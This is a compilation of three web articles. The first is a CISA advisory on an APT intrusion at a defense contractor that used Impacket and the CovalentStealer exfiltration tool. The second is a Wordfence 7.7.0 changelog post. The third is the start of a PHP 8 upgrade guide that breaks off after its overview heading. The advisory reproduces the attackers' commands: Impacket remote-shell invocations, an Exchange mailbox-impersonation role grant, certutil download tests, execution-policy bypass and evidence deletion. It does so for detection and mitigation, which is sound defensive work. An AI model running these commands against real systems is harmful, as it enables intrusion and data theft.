Alert (AA22-277A) Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization

Summary

Actions to Help Protect Against APT Cyber Activity:

• Enforce multifactor authentication (MFA) on all user accounts.
• Implement network segmentation to separate network segments based on role and functionality.
• Update software, including operating systems, applications, and firmware, on network assets.
• Audit account usage.

From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA determined that multiple APT groups had likely compromised the organization’s network and that some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and they also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.

This joint Cybersecurity Advisory (CSA) provides the APT actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.

Technical Details

Threat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the APT cyber activity mapped to the MITRE ATT&CK for Enterprise framework.

From November 2021 through January 2022, CISA conducted an incident response engagement on a DIB Sector organization’s enterprise network. The victim organization also engaged a third-party incident response organization for assistance. During incident response activities, CISA and the trusted third party identified APT activity on the victim’s network.

Some APT actors gained initial access to the organization’s Microsoft Exchange Server as early as mid-January 2021. The initial access vector is unknown. Based on log analysis, the actors gathered information about the Exchange environment and performed mailbox searches within a four-hour period after gaining access. In the same period, these actors used a compromised administrator account (“Admin 1”) to access the Exchange Web Services (EWS) Application Programming Interface (API). In early February 2021, the actors returned to the network and used Admin 1 to access the EWS API again. In both instances, the actors used a virtual private network (VPN).

Four days later, the APT actors used Windows Command Shell over a three-day period to interact with the victim’s network. The actors used Command Shell to learn about the organization’s environment and to collect sensitive data, including sensitive contract-related information from shared drives, for eventual exfiltration. The actors manually collected files using the command-line tool WinRAR. These files were split into approximately 3 MB chunks located on the Microsoft Exchange server within the CU2\he\debug directory. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.
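
The advisory does not reproduce the exact archiving command line. As a purely hypothetical illustration, WinRAR's command-line interface can produce split archives of roughly that size with its volume-size switch (the archive name and path below are placeholders):

    rem Hypothetical example only; not the actors' recorded command line
    rar.exe a -v3m -r staging.rar "<path to collected files>"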

During the same period, APT actors implanted Impacket, a Python toolkit for programmatically constructing and manipulating network protocols, on another system. The actors used Impacket to attempt to move laterally to another system.

In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server. Later in March, APT actors installed HyperBro on the Exchange Server and two other systems. For more information on the HyperBro and webshell samples, see CISA MAR-10365227-2 and -3.

In April 2021, APT actors used Impacket for network exploitation activities. See the Use of Impacket section for additional information. From late July through mid-October 2021, APT actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate the remaining sensitive files. See the Use of Custom Exfiltration Tool: CovalentStealer section for additional information.

APT actors maintained access through mid-January 2022, likely by relying on legitimate credentials.

Use of Impacket

CISA discovered activity indicating the use of two Impacket tools: wmiexec.py and smbexec.py. These tools use Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, respectively, for creating a semi-interactive shell with the target device. Through the Command Shell, an Impacket user with credentials can run commands on the remote device using the Windows management protocols required to support an enterprise network.
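
For context, typical invocations of these Impacket tools look like the following; the domain, credentials, target address, and command are illustrative placeholders, not values observed in this incident:

    # Semi-interactive shell over WMI
    python3 wmiexec.py 'DOMAIN/user:Password123@10.0.0.5' whoami
    # Semi-interactive shell over SMB
    python3 smbexec.py 'DOMAIN/user:Password123@10.0.0.5'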

The APT cyber actors used existing, compromised credentials with Impacket to access a higher privileged service account used by the organization’s multifunctional devices. The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:

powershell add-pssnapin *exchange*;New-ManagementRoleAssignment -Name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account>

This command gave the service account the ability to access other users’ mailboxes.
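
Defenders can enumerate existing ApplicationImpersonation role assignments from the Exchange Management Shell to spot additions like the one above; this is a standard Exchange cmdlet, and any assignment without a documented business need (e.g., journaling or migration software) should be investigated:

    Get-ManagementRoleAssignment -Role ApplicationImpersonation |
        Format-List Name,RoleAssigneeName,WhenCreated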

The APT cyber actors used virtual private network (VPN) and virtual private server (VPS) providers, M247 and SurfShark, as part of their techniques to remotely access the Microsoft Exchange server. Use of these hosting providers, which conceals interaction with victim networks, is common for these threat actors. According to CISA’s analysis of the victim’s Microsoft Exchange server Internet Information Services (IIS) logs, the actors used the account of a former employee to access EWS. EWS enables access to mailbox items such as email messages, meetings, and contacts. The source IP addresses for these connections mostly belong to the VPS hosting provider M247.

Use of Custom Exfiltration Tool: CovalentStealer

The threat actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate sensitive files.

CovalentStealer is designed to identify file shares on a system, categorize the files, and upload the files to a remote server. CovalentStealer includes two configurations that specifically target the victim’s documents using predetermined file paths and user credentials. CovalentStealer stores the collected files in a Microsoft OneDrive cloud folder, includes a configuration file to specify the types of files to collect at specified times, and uses a 256-bit AES key for encryption. See CISA MAR-10365227-1 for additional technical details, including IOCs and detection signatures.

MITRE ATT&CK Tactics and Techniques

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. CISA uses the ATT&CK Framework as a foundation for the development of specific threat models and methodologies. Table 1 lists the ATT&CK techniques employed by the APT actors.

Table 1: APT cyber activity mapped to MITRE ATT&CK for Enterprise

Initial Access

Valid Accounts (T1078): Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.

Execution

Windows Management Instrumentation (T1047): Actors used the Impacket tools wmiexec.py and smbexec.py to leverage Windows Management Instrumentation and execute malicious commands.

Command and Scripting Interpreter (T1059): Actors abused command and script interpreters to execute commands.

Command and Scripting Interpreter: PowerShell (T1059.001): Actors abused PowerShell commands and scripts to map shared drives by specifying a path to one location and retrieving the items from another. See Appendix: Windows Command Shell Activity for additional information.

Command and Scripting Interpreter: Windows Command Shell (T1059.003): Actors abused the Windows Command Shell to learn about the organization’s environment and to collect sensitive data. See Appendix: Windows Command Shell Activity for additional information, including specific commands used. The actors used Impacket tools, which enable a user with credentials to run commands on the remote device through the Command Shell.

Command and Scripting Interpreter: Python (T1059.006): The actors used two Impacket tools: wmiexec.py and smbexec.py.

Shared Modules (T1129): Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.

System Services (T1569): Actors abused system services to execute commands or programs on the victim’s network.

Persistence

Valid Accounts (T1078): Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

Create or Modify System Process (T1543): Actors were observed creating or modifying system processes.

Privilege Escalation

Valid Accounts (T1078): Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.

Defense Evasion

Masquerading: Match Legitimate Name or Location (T1036.005): Actors masqueraded the archive utility WinRAR.exe by renaming it VMware.exe to evade defenses and observation.

Indicator Removal on Host (T1070): Actors deleted or modified artifacts generated on a host system to remove evidence of their presence or hinder defenses.

Indicator Removal on Host: File Deletion (T1070.004): Actors used the del.exe command with the /f parameter to force the deletion of read-only files matching the *.rar and tempg* wildcards.

Valid Accounts (T1078): Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.

Virtualization/Sandbox Evasion: System Checks (T1497.001): Actors used Windows command shell commands to detect and avoid virtualization and analysis environments. See Appendix: Windows Command Shell Activity for additional information.

Impair Defenses: Disable or Modify Tools (T1562.001): Actors used the taskkill command, likely to disable security features. CISA was unable to determine which application was associated with the Process ID.

Hijack Execution Flow (T1574): Actors were observed hijacking execution flow.

Discovery

System Network Configuration Discovery (T1016): Actors used the systeminfo command to look for details about the network configurations and settings and to determine if the system was a VMware virtual machine. The threat actor used route print to display the entries in the local IP routing table.

System Network Configuration Discovery: Internet Connection Discovery (T1016.001): Actors checked for internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways.

System Owner/User Discovery (T1033): Actors attempted to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system.

System Network Connections Discovery (T1049): Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP.

Process Discovery (T1057): Actors used the tasklist command to get information about running processes on a system and to determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running on the computer matching the string “powers.”

System Information Discovery (T1082): Actors used the ipconfig command to get detailed information about the operating system and hardware and to determine if the system was a VMware virtual machine.

File and Directory Discovery (T1083): Actors enumerated files and directories and may have searched specific locations of a host or network share for certain information within a file system.

Virtualization/Sandbox Evasion: System Checks (T1497.001): Actors used Windows command shell commands to detect and avoid virtualization and analysis environments.

Lateral Movement

Remote Services: SMB/Windows Admin Shares (T1021.002): Actors used Valid Accounts to interact with a remote network share using Server Message Block (SMB) and then perform actions as the logged-on user.

Collection

Archive Collected Data: Archive via Utility (T1560.001): Actors used PowerShell commands and WinRAR to compress and/or encrypt collected data prior to exfiltration.

Data from Network Shared Drive (T1039): Actors likely used the net share command to display information about shared resources on the local computer and decide which directories to exploit, the PowerShell dir command to map shared drives by specifying a path to one location and retrieving the items from another, and the ntfsinfo command to search network shares on compromised computers to find files of interest. The actors used dir.exe to display a list of a directory’s files and subdirectories matching a certain text string.

Data Staged: Remote Data Staging (T1074.002): The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\he\debug directory.

Command and Control

Non-Application Layer Protocol (T1095): Actors used a non-application layer protocol for communication between host and Command and Control (C2) server or among infected hosts within a network.

Ingress Tool Transfer (T1105): Actors used the certutil command with three switches to test if they could download files from the internet. The actors employed CovalentStealer to exfiltrate the files.

Proxy (T1090): Actors are known to use VPN and VPS providers, namely M247 and SurfShark, as part of their techniques to access a network remotely.

Exfiltration

Scheduled Transfer (T1029): Actors scheduled data exfiltration to be performed only at certain times of day or at certain intervals to blend traffic patterns with normal activity.

Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002): The actors’ CovalentStealer tool stores collected files in a Microsoft OneDrive cloud folder.

DETECTION

Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:

  • Monitor logs for connections from unusual VPSs and VPNs. Examine connection logs for access from unexpected ranges, particularly from machines hosted by SurfShark and M247.
  • Monitor for suspicious account use (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). To detect use of compromised credentials in combination with a VPS, follow the steps below:
    • Review logs for “impossible logins,” such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location.
    • Search for “impossible travel,” which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: This detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.
    • Search for one IP used across multiple accounts, excluding expected logins. A minimal scripted version of this check is sketched after this list.
      • Take note of any M247-associated IP addresses used along with VPN providers (e.g., SurfShark). Look for successful remote logins (e.g., VPN, OWA) from M247-registered or SurfShark-registered IP addresses.
    • Identify suspicious privileged account use after resetting passwords or applying user account mitigations.
    • Search for unusual activity in typically dormant accounts.
    • Search for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
  • Review the YARA rules provided in MAR-10365227-1 to assist in determining whether malicious activity has been observed.
  • Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).
  • Monitor for anomalous and known malicious command-line use. See Appendix: Windows Command Shell Activity for commands used by the actors to interact with the victim’s environment.
  • Monitor for unauthorized changes to user accounts (e.g., creation, permission changes, and enabling a previously disabled account).
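
To illustrate the "one IP used across multiple accounts" check above, the following PowerShell sketch flags any source IP that authenticated as more than one user. It assumes login events have already been exported to a logins.csv file with User and SourceIp columns (an illustrative schema), and expected shared egress points such as corporate proxies should be excluded:

    # Minimal sketch: flag source IPs seen across multiple accounts
    Import-Csv .\logins.csv |
        Group-Object SourceIp |
        Where-Object { ($_.Group.User | Sort-Object -Unique).Count -gt 1 } |
        ForEach-Object {
            [pscustomobject]@{
                SourceIp = $_.Name
                Accounts = ($_.Group.User | Sort-Object -Unique) -join ', '
            }
        }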

CONTAINMENT AND REMEDIATION

Organizations affected by active or recently active threat actors in their environment can take the following initial steps to aid in eviction efforts and prevent re-entry:

  • Report the incident. Report the incident to U.S. Government authorities and follow your organization’s incident response plan.
  • Reset all login accounts. Reset all accounts used for authentication since it is possible that the threat actors have additional stolen credentials. Password resets should also include accounts outside of Microsoft Active Directory, such as network infrastructure devices and other non-domain joined devices (e.g., IoT devices).
  • Monitor SIEM logs and build detections. Create signatures based on the threat actor TTPs and use these signatures to monitor security logs for any signs of threat actor re-entry.
  • Enforce MFA on all user accounts. Enforce phishing-resistant MFA on all accounts without exception to the greatest extent possible.
  • Follow Microsoft’s security guidance for Active Directory: Best Practices for Securing Active Directory.
  • Audit accounts and permissions. Audit all accounts to ensure all unused accounts are disabled or removed and that active accounts do not have excessive privileges. Monitor SIEM logs for any changes to accounts, such as permission changes or the enabling of a previously disabled account, as this might indicate a threat actor using these accounts. A starting-point audit is sketched after this list.
  • Harden and monitor PowerShell by reviewing guidance in the joint Cybersecurity Information Sheet—Keeping PowerShell: Security Measures to Use and Embrace.
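
As a starting point for the account and permission audit above, the following PowerShell sketch lists dormant accounts and privileged group members in Active Directory; it assumes the RSAT ActiveDirectory module is installed, and the 90-day threshold is illustrative:

    Import-Module ActiveDirectory
    # Accounts with no logon in the last 90 days (candidates to disable)
    Search-ADAccount -AccountInactive -TimeSpan 90.00:00:00 -UsersOnly |
        Select-Object Name,SamAccountName,LastLogonDate
    # Review high-privilege group membership for excessive access
    Get-ADGroupMember -Identity "Domain Admins" -Recursive |
        Select-Object Name,SamAccountName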

Mitigations

Mitigation recommendations are usually longer-term efforts that take place before a compromise as part of risk management efforts, or after the threat actors have been evicted from the environment and the immediate response actions are complete. While some may be tailored to the TTPs used by the threat actor, recovery recommendations are largely general best practices and industry standards aimed at bolstering overall cybersecurity posture.

Segment Networks Based on Function

  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly limits the ability of ransomware and other threat actors to move laterally by controlling traffic flows between, and access to, various subnetworks. (See CISA’s Infographic on Layering Network Security Through Segmentation and NSA’s Segment Networks and Deploy Application-Aware Defenses.)
  • Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt Zero Trust (ZT) principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration.

Manage Vulnerabilities and Configurations

  • Update software, including operating systems, applications, and firmware, on network assets. Prioritize patching known exploited vulnerabilities and critical and high vulnerabilities that allow for remote code execution or denial of service on internet-facing equipment.
  • Implement a configuration change control process that securely creates device configuration backups so that unauthorized modifications can be detected. When a configuration change is needed, document the change and include the authorization, purpose, and mission justification. Periodically compare current device configurations against the most recent backups to verify that no unexpected modifications have been made. If suspicious changes are observed, verify the change was authorized; a minimal comparison is sketched below.
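
A simple way to detect such drift, assuming text-based configuration backups, is to diff the running configuration against the last known-good backup (the file names below are illustrative):

    # Any output indicates a difference that should map to an authorized change
    Compare-Object (Get-Content .\router1-backup.cfg) (Get-Content .\router1-current.cfg)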

Search for Anomalous Behavior

  • Use cybersecurity visibility and analytics tools to improve detection of anomalous behavior and enable dynamic changes to policy and other response actions. Visibility tools include network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Monitor the use of scripting languages (e.g., Python, PowerShell) by authorized and unauthorized users. Anomalous use by either group may be indicative of malicious activity, intentional or otherwise.

Restrict and Secure Use of Remote Admin Tools

  • Limit the number of remote access tools as well as who and what can be accessed using them. Reducing the number of remote admin tools and their allowed access will increase visibility of unauthorized use of these tools.
  • Use encrypted services to protect network communications and disable all clear text administration services (e.g., Telnet, HTTP, FTP, SNMP 1/2c). This ensures that sensitive information cannot be easily obtained by a threat actor capturing network traffic.

Implement a Mandatory Access Control Model

  • Implement stringent access controls to sensitive data and resources. Access should be restricted to those users who require access and to the minimal level of access needed.

Audit Account Usage

  • Monitor VPN logins to look for suspicious access (e.g., logins from unusual geo locations, remote logins from accounts not normally used for remote access, concurrent logins for the same account from different locations, unusual times of the day).
  • Closely monitor the use of administrative accounts. Admin accounts should be used sparingly and only when necessary, such as installing new software or patches. Any use of admin accounts should be reviewed to determine if the activity is legitimate.
  • Ensure standard user accounts do not have elevated privileges. Any attempt to increase permissions on standard user accounts should be investigated as a potential compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA, FBI, and NSA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA, FBI, and NSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze the performance of your detection and prevention technologies.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA, FBI, and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See cisa.gov/cyber-hygiene-services.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.

ACKNOWLEDGEMENTS

CISA, FBI, and NSA acknowledge Mandiant for its contributions to this CSA.

APPENDIX: WINDOWS COMMAND SHELL ACTIVITY

Over a three-day period in February 2021, APT cyber actors used Windows Command Shell to interact with the victim’s environment. When interacting with the victim’s system and executing commands, the threat actors used /q and /c parameters to turn the echo off, carry out the command specified by a string, and stop its execution once completed.
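
In practice this looks like the following invocation, where the quoted command is a placeholder:

    cmd.exe /q /c "<command>"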

On the first day, the threat actors consecutively executed many commands within the Windows Command Shell to learn about the organization’s environment and to collect sensitive data for eventual exfiltration (see Table 2).

Table 2: Commands executed on the first day

net share: Used to create, configure, and delete network shares from the command line.[1] The threat actor likely used this command to display information about shared resources on the local computer and decide which directories to exploit.

powershell dir: An alias (shorthand) for the PowerShell Get-ChildItem cmdlet. This command maps shared drives by specifying a path to one location and retrieving the items from another.[2] The threat actor added additional switches (aka options, parameters, or flags) to form a “one-liner,” a single-line expression of the kind commonly used in exploitation: powershell dir -recurse -path e:\<redacted>|select fullname,length|export-csv c:\windows\temp\temp.txt. This particular command lists the subdirectories of the target environment.

systeminfo, tasklist, and ipconfig: Display detailed configuration information,[3] list currently running processes,[4] and display all current Transmission Control Protocol (TCP)/IP network configuration values and refresh Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings, respectively.[5] The threat actor used these commands with specific switches to determine if the system was a VMware virtual machine: systeminfo > vmware & date /T, tasklist /v > vmware & date /T, and ipconfig /all >> vmware & date /T.

route print: Used to display and modify the entries in the local IP routing table.[6] The threat actor used this command to display the entries in the local IP routing table.

netstat: Used to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and IPv6 statistics.[7] The threat actor used this command with three switches to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP: netstat -anp tcp.

certutil: Used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.[8] The threat actor used this command with three switches to test if they could download files from the internet: certutil -urlcache -split -f https://microsoft.com temp.html.

ping: Sends Internet Control Message Protocol (ICMP) echoes to verify connectivity to another TCP/IP computer.[9] The threat actor used ping -n 2 apple.com to either test their internet connection or to detect and avoid virtualization and analysis environments or network restrictions.

taskkill: Used to end tasks or processes.[10] The threat actor used taskkill /F /PID 8952, likely to disable security features. CISA was unable to determine what this process was, as process identifier (PID) numbers are dynamic.

PowerShell Compress-Archive cmdlet: Used to create a compressed archive, or to zip files, from specified files and directories.[11] The threat actor used parameters indicating shared drives as the file and folder sources and the destination archive as zipped files. Specifically, they collected sensitive contract-related information from the shared drives.

On the second day, the APT cyber actors executed the commands in Table 3 to perform discovery as well as collect and archive data.

Table 3: Commands executed on the second day

ntfsinfo.exe: Used to obtain volume information from the New Technology File System (NTFS) and to print it along with a directory dump of NTFS metadata files.[12]

WinRAR.exe: Used to compress files; the actors subsequently masqueraded WinRAR.exe by renaming it VMware.exe.[13]

On the third day, the APT cyber actors returned to the organization’s network and executed the commands in Table 4.

Table 4: Commands executed on the third day

powershell -ep bypass import-module .\vmware.ps1;export-mft -volume e
Threat actors ran this PowerShell command with the -ep bypass parameter to bypass the execution policy, import the vmware.ps1 script as a module into the current session, and run its export-mft function. The module appears to acquire and export the Master File Table (MFT) for volume E for further analysis by the cyber actor.[14]

set.exe: Used to display the current environment variable settings.[15] (An environment variable is a dynamic value pointing to system or user environments (folders) of the system. System environment variables are defined by the system and used globally by all users; user environment variables are used only by the user who declared them and override identically named system environment variables.)

dir.exe: Used to display a list of a directory’s files and subdirectories matching the eagx* text string, likely to confirm the existence of such a file.

tasklist.exe and find.exe: Used to display a list of applications and services, with their PIDs, for all tasks running on the computer matching the string “powers”.[16][17][18]

ping.exe: Used to send two ICMP echoes to amazon.com. This could have been to detect or avoid virtualization and analysis environments, circumvent network restrictions, or test their internet connection.[19]

del.exe with the /f parameter: Used to force the deletion of read-only files matching the *.rar and tempg* wildcards.[20]

References

[1] Microsoft Net Share

[2] Microsoft Get-ChildItem

[3] Microsoft systeminfo

[4] Microsoft tasklist

[5] Microsoft ipconfig

[6] Microsoft Route

[7] Microsoft netstat

[8] Microsoft certutil

[9] Microsoft ping

[10] Microsoft taskkill

[11] Microsoft Compress-Archive

[12] NTFSInfo v1.2

[13] rarlab

[14] Microsoft Import-Module

[15] Microsoft set (environment variable)

[16] Microsoft tasklist

[17] MITRE ATT&CK – Software: Tasklist

[18] Microsoft find

[19] Microsoft ping

[20] Microsoft del

Revisions

October 4, 2022: Initial version

Source:
https://www.cisa.gov/uscert/ncas/alerts/aa22-277a

Wordfence 7.7.0 Is Out! Here Are The Changes

Wordfence 7.7.0 has just been released and, as usual, it includes several awesome enhancements and updates for our security-conscious WordPress publishers and e-commerce websites. This post goes into a little more detail on each change we’ve included. We don’t usually post additional detail like this, so we thought we’d give it a try and make it a routine if the community approves.

This is based on the official Wordfence 7.7.0 changelog, which is included below. The format I’ve used here is the changelog entry as a heading and some detail on what the entry means and some background where applicable.

Improvement: Added configurable scan resume functionality to prevent scan failures on sites with intermittent connectivity issues

We’ve added “scan resume” functionality, which is configurable and will prevent security scan failures on sites that might have intermittent connectivity issues. As you know, Wordfence runs on over 4 million websites across more than 12,000 unique networks, and to say that we run in a range of environments and configurations is an understatement. Our quality assurance team has an oversized influence on the product, and this is one more way they have made Wordfence even more robust in version 7.7.0.

Improvement: Added new scan result for vulnerabilities found in plugins that do not have patched versions available via WordPress.org

This adds a scan result for plugins that have a vulnerability and are still present in the official WordPress plugin repository, and where there is no fix available. The usual course of action is that the plugin team will disable a plugin in the repository that has a known vulnerability, where the vulnerability has not been fixed yet. In some cases, this doesn’t happen, and this scan result is designed to deal with this unusual case. This change will also allow plugins that are not provided through wordpress.org to be flagged as vulnerable if there is no update available.

Improvement: Implemented stand-alone MMDB reader for IP address lookups to prevent plugin conflicts and support additional PHP versions

We use the MaxMind database internally for location lookups. Our code was using the MaxMind PHP library to perform these lookups. MaxMind stopped supporting older PHP versions a while ago, but many of our customers are still on those older versions. We have also found that other WordPress plugins may use a different version of the MaxMind library, which can lead to conflicts. So we’ve rolled our own stand-alone MMDB reader to resolve both of these issues. We now support older PHP versions than the official MaxMind library does, and you won’t see any conflicts if another plugin is using the MaxMind library.

Improvement: Added option to disable looking up IP address locations via the Wordfence API

By default Wordfence contacts our servers to perform an IP address location lookup. This is just the way the plugin was originally engineered (by me actually) to try to move as much processing to our own servers and reduce resource usage on our customer websites. Some of our customers prefer that lookup to happen locally, so we’ve provided that option. The default is still to do the lookup on our servers, but you have the option to enable local lookups. The one downside of enabling this feature is that you’ll only get country-level lookups.

Improvement: Prevented successful logins from resetting brute force counters

Another design decision I made early on is that a successful login on a WordPress website would reset our brute-force login counters to zero. This made sense because if a real user makes multiple login failures and then succeeds, clearly they’re the real user, and we should reset our counters so that their next failure doesn’t lock them out. Well, an unintended side effect of this is that a threat actor can register an account on a WordPress website with open registration and sign in, and that would reset the brute force counters to zero, so they can keep trying to guess an admin account’s password. We’ve fixed this by removing the reset that occurs on successful login.
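
In simplified terms, the logic changed as in the following PHP sketch; this is our illustration of the general idea, not Wordfence's actual implementation:

    <?php
    // Simplified illustration only; not Wordfence's actual code.
    function record_failed_login(string $ip, array &$counts): void {
        $counts[$ip] = ($counts[$ip] ?? 0) + 1; // lockout triggers at a threshold
    }

    function record_successful_login(string $ip, array &$counts): void {
        // Old behavior: unset($counts[$ip]); // success reset the counter
        // New behavior: keep the counter, so a self-registered account's
        // successful login no longer clears an attacker's failure history.
    }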

Improvement: Clarified IPv6 diagnostic

We found that a message on our diagnostics page caused users to think they need to fix something related to IPv6. So we clarified the message to prevent our customers from going on wild goose chases trying to fix something that doesn’t need fixing.

Improvement: Included maximum number of days in live traffic option text

This is also a clarification. The maximum amount of data in live traffic that we store is 30 days. This wasn’t clear and some users would enter a larger number of days, expecting to see more than 30 days of data. We’ve fixed this user interface issue to make it clear.

Fix: Made timezones consistent on firewall page

When the page showing firewall activity loaded more results, they’d be in UTC time instead of your correct timezone. Oops! We fixed that little issue.

Fix: Added “Use only IPv4 to start scans” option to search

We have the ability to search your Wordfence options page which is super useful. This option was not included in the search, so we fixed that.

Fix: Prevented deprecation notices on PHP 8.1 when emailing the activity log

PHP 8.1 provides notices that a function has been deprecated if a developer (like us) is using an older function call. We were in this case, and PHP 8.1 was rightfully complaining about it. So we switched to a more modern version of the same code.

Fix: Prevented warning on PHP 8 related to process owner diagnostic

On our diagnostics page, if a hosting provider has restricted an account from seeing its own username, our customers would see a warning that you can’t access an array offset on a boolean. We fixed that.

Fix: Prevented PHP Code Sniffer false positive related to T_BAD_CHARACTER

We use PHP code sniffer to look for things that are incompatible between versions. We were getting a false positive when using this internal tool, so we fixed that. This change is really for the benefit of our engineering team.

Fix: Removed unsupported beta feed option

A long time ago when there was fire in the sky and the seas were boiling, we launched the first version of the Wordfence firewall. Because we wanted to test out new rules, and some of our users were brave enough to try the new stuff, we included this option. We would release beta firewall rules and malware signatures, and our brave testing community would try them out first by enabling this option. We do all our testing internally now and the firewall code and rule syntax has become extremely robust, so we don’t do these kinds of releases anymore. So we removed this configuration option.

Below I’ve included the short version of the changelog that you’ll see on WordPress.org. You’re most welcome to post your comments and questions below. Keep in mind that support questions are best posted via our official support channels, but if you’d like to chat about this post, comment below and a member of the team or I will reply if needed.

Regards,

Mark Maunder – Wordfence Founder & CEO

Wordfence 7.7.0 – OCTOBER 3, 2022

  • Improvement: Added configurable scan resume functionality to prevent scan failures on sites with intermittent connectivity issues
  • Improvement: Added new scan result for vulnerabilities found in plugins that do not have patched versions available via WordPress.org
  • Improvement: Implemented stand-alone MMDB reader for IP address lookups to prevent plugin conflicts and support additional PHP versions
  • Improvement: Added option to disable looking up IP address locations via the Wordfence API
  • Improvement: Prevented successful logins from resetting brute force counters
  • Improvement: Clarified IPv6 diagnostic
  • Improvement: Included maximum number of days in live traffic option text
  • Fix: Made timezones consistent on firewall page
  • Fix: Added “Use only IPv4 to start scans” option to search
  • Fix: Prevented deprecation notices on PHP 8.1 when emailing the activity log
  • Fix: Prevented warning on PHP 8 related to process owner diagnostic
  • Fix: Prevented PHP Code Sniffer false positive related to T_BAD_CHARACTER
  • Fix: Removed unsupported beta feed option

Source:
https://www.wordfence.com/blog/2022/10/wordfence-7-7-0-is-out-here-are-the-changes/

PHP 8: How to Update the PHP Version of Your WordPress Site

Considered one of the most beginner-friendly programming languages, PHP continues to introduce tremendous changes with each update. Embracing the change, this blog focuses on the steps to upgrade to PHP 8.0 on a WordPress website.

Previously, PHP 7’s speed optimization update helped a lot with gaining higher rankings on the SERPs. Carrying the legacy forward, PHP surprised its enthusiasts with a release of PHP 8.0 back in November 2020, which brought a list of new features that revolutionized the way programmers worked.

PHP 8 lets you write concise code and build more exemplary applications with exciting changes and improvements to the earlier RFCs. Considering the new improvements, it would be a crime not to upgrade your current PHP version to PHP 8.0 on your WordPress site.

Before we jump towards the steps to upgrade your PHP version to PHP 8 on WordPress, we will give a brief PHP 8.0 overview to help you get acquainted with the update.

PHP 8.0 – An Overview

